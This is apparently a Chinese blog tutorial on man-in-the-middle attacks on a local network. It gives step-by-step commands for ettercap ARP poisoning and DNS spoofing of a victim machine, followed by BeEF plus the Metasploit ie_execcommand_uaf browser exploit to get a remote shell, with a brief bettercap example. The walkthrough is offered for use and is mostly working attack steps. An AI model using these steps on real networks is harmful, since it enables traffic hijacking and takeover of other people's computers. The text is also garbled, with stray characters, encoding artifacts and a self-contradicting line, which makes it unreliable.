前言,提起中間人攻擊滞详,首先我們會想到老牌的ettercap凛俱,今天我們來介紹幾種內(nèi)網(wǎng)中間人攻擊的工具
ettercap,bettercap,mitmf(當(dāng)然還需要beef和metasploit配合紊馏,效果更佳)
0x01 ettercap
ettercap是LINUX下一個強(qiáng)大的 欺騙工具,當(dāng)然WINDOWS也能用蒲犬,你能夠用飛一般的速度創(chuàng)建和發(fā)送偽造的包.讓你發(fā)送從網(wǎng)絡(luò)適配器到應(yīng)用軟件各種級別的包.綁定監(jiān)聽數(shù)據(jù)到一個本地端口:從一個客戶端連接到這個端口并且能夠?yàn)椴恢赖膮f(xié)議解碼或者把數(shù)據(jù)插進(jìn)去(只有在arp為基礎(chǔ)模式里才能用)
metasploit配合beef+ettercap局域網(wǎng)dns劫持拿shell
所用工具:metasploit beef ettercap
首先我們通過
ettercap -G 打開我們的ettercap工具
指定網(wǎng)卡 Sniff -> Unified sniffing -> Ok
然后通過 Hosts->Scan for hosts 掃描一下局域網(wǎng)的機(jī)器,通過 Hosts->Hosts list 顯示出來,如圖
其中 192.168.2.1為網(wǎng)關(guān),192.168.2.105為受害機(jī)器
我們選中192.168.2.105 Add to Target 1
選中網(wǎng)關(guān) 192.168.2.1 Add to Target 2
如圖
選中 Mitm -> Arp poisoning -> 勾選Sniff remote connections 點(diǎn)ok 如圖
選中 Plugins -> Manage the Plugins -> 雙擊 dns_spoof
這樣我們就完成了受害機(jī)器的dns劫持過程,我們修改一下
vim /etc/ettercap/etter.dns
使其無論打開什么網(wǎng)址,其實(shí)打開的都是 192.168.1.104 ok 一切準(zhǔn)備就緒,我們開始運(yùn)行ettercap 如圖:
好了,我們在受害機(jī)器了ping一下,看看是否劫持成功
沒有問題,所有的網(wǎng)址都沒劫持到192.168.2.104上
接下來,我們使用metasploit 和 beef 工具,利用xp下的ie漏洞拿shell
剛開始的時候,需要beef和metasploit關(guān)聯(lián)一下
我們配置一下
vim /usr/share/beef-xss/config.yaml
開啟metasploit 拓展
然后配置一下拓展下的metasploit配置文件
vim /usr/share/beef-xss/extensions/metasploit/config.yaml
把ip填寫成攻擊機(jī)器的ip,把metasploit路徑填上,保存.
這就完成了beef和metasploit的關(guān)聯(lián)
然后把metasploit的服務(wù)開啟朱监,
由于使用PostgreSQL作為數(shù)據(jù)庫,因此原叮,必須先運(yùn)行它赫编。
root@kali:~# service postgresql start
啟動Metasploit服務(wù)
root@kali:~# service metasploit start
在命令行下用msfconsole把控制臺打開,接著加載beEF奋隶。所用命令為:“l(fā)oad msgrpc ServerHost=192.168.2.104 Pass=abc123”
下面我們來啟動beef
cd /usr/share/beef-xss/ ./beef -x
我們看到 metasploit 已經(jīng)加載進(jìn)來了
我們通過 http://192.168.2.104:3000/ui/panel 打開beef界面,用戶名和密碼都是beef
好了,現(xiàn)在一切都已經(jīng)準(zhǔn)備好,讓我們用php編寫一個程序,去搞shell吧
vim /var/www/index.php
我們再進(jìn)入msf
use exploit/windows/browser/ie_execcommand_uaf set SRVHOST 192.168.2.104 set URIPATH / exploit
這樣就完成了監(jiān)聽,一旦目標(biāo)機(jī)器打開網(wǎng)站
給他一個跳轉(zhuǎn),讓它跳轉(zhuǎn)到 http://192.168.2.104:8080
看一眼我們的metaspolt 已經(jīng)拿到了
使用sessions -i id號 控制目標(biāo)機(jī)器
好了 最后一張圖 完結(jié) 累死
0x02 bettercap
bBetterCap是一個功能強(qiáng)大擂送、模塊化、輕便的MiTM框架达布,可以用來對網(wǎng)絡(luò)開展各種類型的中間人攻擊(Man-In-The-Middle)团甲。它也可以幫你實(shí)時地操作HTTP和HTTPS流量,以及其他更多功能黍聂。
bettercap -I eth0 -X